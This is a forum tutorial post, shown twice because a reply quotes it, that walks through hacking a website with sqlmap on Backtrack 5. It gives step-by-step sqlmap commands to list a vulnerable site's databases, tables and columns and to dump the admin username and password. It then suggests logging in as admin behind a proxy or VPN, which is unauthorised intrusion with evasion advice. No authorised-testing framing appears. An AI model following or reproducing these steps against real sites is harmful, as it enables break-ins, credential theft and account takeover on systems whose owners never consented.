Hack website using Backtrack (sqlmap)

by **Admin** Tue Dec 24, 2013 4:57 am

In my previous tutorial I have explained what is [You must be registered and logged in to see this link.], now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal[You must be registered and logged in to see this link.]
2. Now find the vulnerable site. (well I already have vulnerable site)
[You must be registered and logged in to see this link.]
3. Now type this command in the terminal and hit enter.(refer above figure)

python sqlmap.py -u [You must be registered and logged in to see this link.] –dbs

4. Now you will get the database name of the website
[You must be registered and logged in to see this link.]
Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.

python sqlmap.py -u [You must be registered and logged in to see this link.] -D (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.

python sqlmap.py -u [You must be registered and logged in to see this link.] -D aj –tables

[You must be registered and logged in to see this link.]
7. Now you will get the tables list which is stored in aj database.
[You must be registered and logged in to see this link.]

8. Now lets grab the columns from the admin table

python sqlmap.py -u [You must be registered and logged in to see this link.] -T admin --columns

[You must be registered and logged in to see this link.]
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin

python sqlmap.py -u [You must be registered and logged in to see this link.] -T admin -U test --dump

Now we got the username and the password of the website !
[You must be registered and logged in to see this link.]
Now just [You must be registered and logged in to see this link.] of the website and use proxy/vpn when you are trying to login in the website as a admin.
- See more at: [You must be registered and logged in to see this link.]

by **Admin** Tue Dec 24, 2013 4:58 am

Admin wrote: In my previous tutorial I have explained what is [You must be registered and logged in to see this link.], now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal[You must be registered and logged in to see this link.]
2. Now find the vulnerable site. (well I already have vulnerable site)
[You must be registered and logged in to see this link.]
3. Now type this command in the terminal and hit enter.(refer above figure)
python sqlmap.py -u [You must be registered and logged in to see this link.] –dbs

4. Now you will get the database name of the website
[You must be registered and logged in to see this link.]
Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u [You must be registered and logged in to see this link.] -D (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python sqlmap.py -u [You must be registered and logged in to see this link.] -D aj –tables

[You must be registered and logged in to see this link.]
7. Now you will get the tables list which is stored in aj database.
[You must be registered and logged in to see this link.]

8. Now lets grab the columns from the admin table
python sqlmap.py -u [You must be registered and logged in to see this link.] -T admin --columns
[You must be registered and logged in to see this link.]
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python sqlmap.py -u [You must be registered and logged in to see this link.] -T admin -U test --dump
Now we got the username and the password of the website !
[You must be registered and logged in to see this link.]
Now just [You must be registered and logged in to see this link.] of the website and use proxy/vpn when you are trying to login in the website as a admin.